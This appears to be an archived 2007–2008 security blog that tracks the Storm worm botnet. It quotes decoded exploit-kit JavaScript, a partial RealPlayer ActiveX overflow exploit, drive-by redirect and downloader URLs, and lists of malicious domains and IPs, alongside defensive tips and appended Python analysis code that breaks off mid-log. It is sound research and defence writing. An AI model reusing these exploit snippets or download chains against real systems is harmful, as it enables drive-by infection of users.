Tuesday, January 15, 2008

CME711: Happy Valentine's Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted to sending IPs in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with decoy binary names in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click here to launch the download
and then press Run


The link is generated by JavaScript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That JavaScript decodes to <a href="with_love.exe">. There is also an image of a pink heart on the page that links to with_love.exe. You may wish to update your Snort signatures.

Additionally we're tracking a phish using Storm worm fast-flux nodes with the domain ibank-halifax.com.


Thursday, January 10, 2008

CME711 Domains offline.

Steven Adair with Shadowserver is reporting that all the Stormworm domains have been marked NOT DELEGATED.

Randy V also performed some checks today and found the same thing. We're keeping a close eye on our honeypot to see if they change domains or if this is simply a smoke screen.

The authors were probably finished with the domains anyway, since it's well past the New Year. The DISOG team is placing bets on the next ruse. I say adult-rated material for February 14th (St. Valentine's Day).

Domains that have been flagged and appear to be disabled:

i-halifax.com, i-barclays.com, newyearcards2008.com, happycards2008.com, uhavepostcard.com, merrychristmasdude.com, newyearwithlove.com, familypostcards2008.com, freshcards2008.com, hellosanta2008.com, happy2008toyou.com, happysantacards.com, hohoho2008.com, santawishes2008.com, santapcards.com, postcards-2008.com, parentscards.com


Friday, December 28, 2007

New Year, Recycled Greeting Cards

The Storm authors have made up for their lack of creativity by registering a bunch of domains and quickly changing the filename. Additionally a decoy filename has been added as an HTML comment in the source:
Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );
The JavaScript actually decodes to:
<a href="happynewyear2008.exe">
This was probably done in an attempt to identify automated scripts that parse the page for links, then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):

serving the following files:
happynewyear2008.exe
happy_2008.exe
sony.exe


Wednesday, December 26, 2007

Bah, Storm.

I'd like to thank everyone who wrote in with the updates: CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of non-digital happiness, and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious afterthought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text-only front page:
Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!
Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded JavaScript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second-rate script rats should think twice before getting in bed with these goons - they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Year's wish, I'd like a picture of the CME711 weenies drinking well-expired eggnog. I'd also settle for another wonderful day with the family, as it was today.


Monday, December 24, 2007

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!


We just received a handful of these in our mail drops. Looks like the Grinch still runs Storm.
Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (see the previous post) has no trouble with this JavaScript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);


So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...
function startANI() {
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = '<iframe src="?o2&p=595022058&r=2792316769" height="1" width="1">';
return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);
...snip...

The ANI looks fun:
From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]


Once run in the sandbox, %windir%/disnisa.exe is the dropped binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario).


Saturday, December 22, 2007

The silent Storm and Javascript Decoding

It's been a while since I've posted anything. I haven't lost touch; I've just been busy with the upcoming holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet in favor of laying low for a few months and releasing a whole new version of the code, one with fewer bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid-November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write-up here. In fact, Daniel sparked my interest in decoding malicious JavaScript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic JavaScript decoder, which you can freely download and use. It is coded with an eye towards Unix-flavored operating systems, but should work fine if you have SpiderMonkey installed for Windows and don't mind modifying the code slightly. Jsdecode is a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application; therefore SpiderMonkey must be installed before this script will work.

Most malicious JavaScript can be decoded by simply running it through this script. So far I've only had a handful of malicious scripts requiring more advanced thought. The script isn't magic: it creates a document.write function for you, modifies eval statements so they print to the screen, and reruns the decoded JavaScript to make sure it isn't just double encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)


Wednesday, December 05, 2007

QuickTime and RealPlayer Exploits

We're seeing lots of reports about QuickTime and RealPlayer exploits in the wild. Other security vendors are privately reporting more than 300 sites infected with these exploits. Most of them are iframes pointing to encoded JavaScript. Of course, users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....

(removed some content)
.....
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to update their third-party applications. Please remember to apply security patches for those as frequently as (or more often than) Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!


Thursday, November 15, 2007

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded JavaScript. It decodes to:
<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

The site opened by the JavaScript looks like this (screenshot not reproduced):

The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.


Thursday, November 08, 2007

CME711-Track Beta

Several people are interested in learning more about CME711 and generally how to track botnets. I fully respect and encourage that curiosity with one caveat - you will get attacked, and Storm may not be the best starter botnet.

If the bad guys are half as good as I suspect they are, they already know how I am downloading their binaries, and they don't care or there is nothing they can do about it. Furthermore, it's easier to hide in plain sight, so I've made a decision to open some code up to everyone. It really isn't all that special and others are probably using similar code. For someone new to this fight, it may be the jump start you need. Good botnet monitoring skills are in high demand.

Originally we ran FakeSMTP (an email honeypot) and forced the Storm binaries to communicate with that SMTP server instead of using public relays. FakeSMTP would capture the body of the message, which had the download link. I had a script automatically parse and download the binaries, but that was slow and clunky. It also relied on my node being used as a spam proxy, which was happening less frequently.

Additionally that meant I had to run the binary. Running the binary is risky. For example, you could participate in denial of service attacks. Even with rate limiting, you still run the risk of doing harm. It's certainly not recommended for those who are new to the arena.

CME711-Track is a Perl script I hacked together for tracking the Peacomm/Storm/Peed/Nuwar trojans. Similar code has been used by DISOG since July 2007. While I modified the code slightly for public release, the general function is the same. The script is very simple: it contacts CME711's servers and tries to download a binary. If successful, it saves the file and adds a time-stamp to the log. Such logs can be used as blocklists, or to track infected hosts.

I overly commented the code on purpose. I had hoped those new to Perl and the world of botnet tracking would download it and learn how things work. Plain-text readable comments and code encourage additional research.

There are zero license restrictions on this script. Anyone is welcome to run it, for as long as you wish. I hope you would consider mentioning DISOG in any research/postings; however if you don't, my feelings aren't likely to be hurt.

Script requirements: see "readme.txt" for more information. The code will not run if you don't follow the directions included in the readme. I did that on purpose - I believe if you can't read, you shouldn't be tracking botnets.

WARNING: This script will attempt to download live malware and no support is provided. You assume all risks associated with downloading malware, or pissing off the botnet operators. This includes denial of service attacks. I tried to comment the code as much as possible, and you're welcome to send questions via email. I will do my best to answer them in a timely manner.

http://www.disog.org/public/CME711-Track.zip
(MD5: ac85bf1b06be2653c6e647b839c5a9b9 ) (SHA1: b4c93d489693616a8150e607d4b7e98ca1b2ec61)

Be smart! This code should run on any operating system with a Perl interpreter, which includes Windows. However, it will download real malware. The risk of accidentally running this code on a Windows machine is high. I don't recommend it. Run it on Linux, Mac, or a virtual Windows machine. You'll be wasting a lot of time cleaning up your machine - not to mention looking like an idiot - if you don't follow this simple warning.


Wednesday, November 07, 2007

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs UTC on November 7th, the XOR'd MPack JavaScript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…
function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}
…snip…

The link in the urlRealExe variable is formerly known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempt to hide their exploit in layered JavaScript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.


Saturday, October 20, 2007

Detecting CME711 (Storm)

For those of you just joining us...

The trojan known as CME711 by Mitre, or Peacomm, Peed, Storm, and Nuwar, infects machines using social engineering. A user will receive an email with half a dozen or fewer lines of text. The email suggests the user will receive a greeting card, free game, or music sharing software. Other social engineering spams attributed to Storm have been placed on blogs and webpages.

More often than not, unsuspecting users will click the link provided in these emails or blogs. For those who are unlucky enough to have not applied patches to their operating system or third-party software, the authors of this trojan have left a special treat - a JavaScript ripped from the MPack suite.

When an unpatched user visits an Mpack infected site, they are infected with a host of malware. No user interaction is required for infection.

For those who have applied all patches, the authors have created a professional looking webpage that may spark your interest and have you clicking links. Either way, the end result is an infection, and your PC is turned into a zombie for the Storm botnet.

The botnet communicates using the same peer-to-peer technology as many file sharing applications like Gnutella and eDonkey. Since it uses this technology, it is hard to determine where botnet commands originate or how many zombies are a part of this botnet. Due to the peer-to-peer structure, locating the person controlling this network is very difficult. Worse still, the commands issued by the botnet controller are encrypted. The network uses DNS double fast-flux to keep researchers from shutting down the malware distribution points. Over 40,000 unique IP addresses have been seen by DISOG in the last 6 months serving malicious code for Storm. The Storm botnet is truly a global pest.

Many people have written in and asked for quick ways to detect if they are infected with Storm. This is difficult because Storm uses rootkit technology. To add to the misery, the code morphs every 30 to 60 seconds, which means you are unlikely to infect yourself with the same piece of code twice.

I've tested a few of the freely available rootkit detectors, and have come up with this pattern for tests:

Install rootkit detector -> run test -> reboot -> run test again.

Sophos rootkit detector and gmer both detected the hidden files after reboot, but neither detected on the first test.

Many people are reluctant to install another piece of software and I can understand why, so I decided to test the current version of Storm's file hiding technology. What I found is that you're able to determine if you've been infected by creating one file, and then trying to list that file using the DOS directory (dir) command. You are also able to do this from the GUI, however the results are a little less obvious.

For this test, click start->run and type "cmd" (without quotes). A Command Prompt window will appear. Next you will want to create a file called spooldr.test. Do so by typing 'copy con spooldr.test'. Nothing will appear to happen, you will just be pushed to a blank line below your copy con command. Type something random and press enter. Then press the F6 key. You will see ^Z and '1 file(s) copied.' then you will be returned to your command prompt (C:\Documents and Settings\whatever\>) again. What you've just done is created a file with whatever text you typed on the blank line, just like if you created a new file in notepad and saved it.

Type 'dir spooldr.test'. If you're able to see the file with the current date and time, you're not infected with this version of Storm. If you can't list this file, you're probably infected, and need to seek professional help for removal.

It is trivial for the Storm authors to change their tactics and use another pattern for hiding their files. (SEE UPDATE BELOW!) I will try to keep on top of any changes and post them here - for now this should work on most systems. I could have written a program to do this for you and I am sure someone else will. However I believe in education, and you just can't learn anything if someone does all the work for you.

My first test was to run the most recent version of Storm as a normal, unprivileged user. The bot did make contact with the Storm network, however the rootkit function did not work, and I was able to see the spooldr.cfg file, which contains the current list of peers assigned to my computer. Upon reboot the software did not restart, so my machine did not participate with the botnet any longer. Running the code as administrator was when it became dangerous. Security experts have long recommended using a non-privileged account for normal operations and only logging in as administrator when absolutely necessary. As if you needed another reason, right?

UPDATE:

McAfee is reporting the filenames have changed from spooldr.* to noskrnl.*. They also reminded us that wincom.* was used towards the beginning of the year. It's doubtful they changed the name based on this blog post. More likely it was just good timing. I just grabbed a new binary and it's still using spooldr.* - to be safe, try all three files.


Thursday, October 18, 2007

MP3 Pump and Dumps -- UPDATED

Private security lists are buzzing about the latest Storm (CME711) pump-and-dump spam, which is arriving as MP3 audio attachments. Our mail drops have not received any of these yet, because our mail servers drop those attachments.

I've removed that restriction and hope to capture some samples soon. I've heard a sample and was barely able to understand the audio, though it is in English. I do not have permission to share that sample, so I will not be posting it here.

If you have a sample you'd like to share with the other readers, please send it as a zip attachment to security at disog dot org and let us know if we can attribute it to you.


Thanks for the submissions!

From an anonymous administrator

From Brent Eads


Tuesday, October 16, 2007

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turnover of the active list from yesterday:
190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197
and the currently active list:
209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176
Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.


Friday, October 12, 2007

Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either p2p, in DDOS attacks, or spreading 'spa-m-alware' (mostly the latter, since our SMTP honeypot is set up to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and working to change his sites. SuperLaugh will be spammed using the ruse 'a funny cat e-card.'

Lending an air of credibility to the scam SuperLaugh.com, which is a valid ecard site, also has a file called SuperLaugh.exe which is downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe and has an MD5Sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legit file is harmless.

Malware page: (screenshot not reproduced)

Legit page: (screenshot not reproduced)

(The pages are both animations; the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static html code, the authors are also attaching the Mpack xor'd javascript to the end of their pages. The javascript will attempt to exploit several old vulnerabilities within windows and third party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISPs are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null routing those domains. We're still getting activity on the following domains:
ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com
We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information, we believe he launched a Joe job attack as described in the last blog entry.

We've seen researchers using Tor to capture binaries or communicate with the network, we see denial of service attacks on high-profile IPs, probably related to researchers' honeypots, and we suspect we've seen a few attempted takeover attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second-rate script kiddie.


Friday, September 28, 2007

Stormworm - iframe hell.

This morning we started receiving dual-language Storm worm emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс (Russian: "Look what they're writing about you, you bitch, everyone look! Here's the address")
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page is not yet available (404 error); however, there is an index page, and it has JavaScript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4


The sid=1, sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php


sid=4 is a JavaScript-encoded page that tries to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php returns a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an MPack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fastflux --yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.
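Walking a chain like the one above by hand (index page, go.php?sid=N, fake error pages, iframe.php, exe.php) is tedious and easy to get wrong, so here is an added example of doing it offline. This is not the blog's code; it parses each fetched page for iframe/frame/script sources, meta refreshes and the URLs inside inline document.write() / location.href scripts, follows them breadth-first with a depth cap, and lists every hostname touched. The sample site is constructed for the example (placeholder .example hostnames, not the ones in the post) and is served from a dictionary, so nothing is fetched from the network.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class RefExtractor(HTMLParser):
    """Collect every URL a page would load or redirect to, without rendering it."""

    def __init__(self):
        super().__init__()
        self.refs = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "frame", "script") and a.get("src"):
            self.refs.append(a["src"])
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url=(\S+)", a.get("content") or "", re.I)
            if m:
                self.refs.append(m.group(1).strip("'\""))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline scripts: document.write('<iframe src="...">') and location.href = "..."
        if self._in_script:
            self.refs += re.findall(r"src\s*=\s*\\?['\"]([^'\"\\]+)", data)
            self.refs += re.findall(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)", data)


def extract_refs(base_url, html):
    p = RefExtractor()
    p.feed(html)
    return [urljoin(base_url, r) for r in p.refs]


def follow_chain(start, fetch, max_depth=6):
    """Breadth-first walk of the redirect graph. fetch(url) returns the page body,
    or None when there is nothing to parse (a 404, or a binary such as exe.php)."""
    edges, seen, queue = [], {start}, [(start, 0)]
    while queue:
        url, depth = queue.pop(0)
        body = fetch(url)
        if body is None:
            edges.append((url, None))  # dead end or payload: record it and stop here
            continue
        for ref in extract_refs(url, body):
            edges.append((url, ref))
            if ref not in seen and depth < max_depth:
                seen.add(ref)
                queue.append((ref, depth + 1))
    return edges


def hosts_in(edges):
    """Distinct hostnames touched by the chain: the list to hand to the DNS/IDS people."""
    return sorted({urlparse(u).hostname for a, b in edges for u in (a, b) if u})


# Constructed sample site; the hostnames are placeholders, not the ones in the post.
PAGES = {
    "http://landing.example/index.html":
        "<html><body>Your download should begin shortly."
        '<iframe src="http://landing.example/st/go.php?sid=1" width=1 height=1></iframe>'
        '<iframe src="http://landing.example/st/go.php?sid=2" width=1 height=1></iframe>'
        "</body></html>",
    "http://landing.example/st/go.php?sid=1":
        "<h1>404 Not Found</h1>"  # fake error page with hidden iframes
        '<iframe src="http://hop-a.example/mail/cn.php"></iframe>'
        '<iframe src="http://hop-b.example/xxx/iframe.php"></iframe>',
    "http://landing.example/st/go.php?sid=2":
        "<script>document.write('<iframe src=\"http://hop-b.example/bn/index.php\" "
        "width=1 height=1></iframe>');</script>",
    "http://hop-a.example/mail/cn.php":
        '<iframe src="http://kit.example/ts/in.cgi?x"></iframe>',
    "http://hop-b.example/xxx/iframe.php":
        '<meta http-equiv="refresh" content="0;url=http://hop-b.example/bn/index.php">',
    "http://hop-b.example/bn/index.php":
        '<script src="http://hop-b.example/bn/exe.php"></script>',
    "http://kit.example/ts/in.cgi?x":
        '<script>location.href = "http://payload.example/1278/file.php";</script>',
}
START = "http://landing.example/index.html"

if __name__ == "__main__":
    edges = follow_chain(START, PAGES.get)
    for src, dst in edges:
        print(src, "->", dst or "(no HTML: 404 or binary)")
    print("hosts:", ", ".join(hosts_in(edges)))
```

Swap PAGES.get for a real fetcher (one that returns None for non-HTML bodies and saves the binaries to disk) and the same walk produces the domain list at the end of the post; the depth cap and the seen set keep a looping iframe.php from running forever.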


Saturday, September 08, 2007

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IP's less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1
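To turn a poller log like the one above into numbers (how many distinct IPs, how long each one was held, whether the domain now points at loopback), here is an added example that is not part of the post. It parses the exact line format above (a single timestamp is a one-shot observation, "NOW" is open-ended) and computes the per-IP hold time; the thresholds for calling something fast-flux (at least 5 distinct public IPs, median hold of an hour or less) are my assumptions, not the blog's.

```python
import ipaddress
import re
from datetime import datetime

# Copied from the DISOG observation log above; the "NOW" entry is open-ended.
ROTATION_LOG = """
2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
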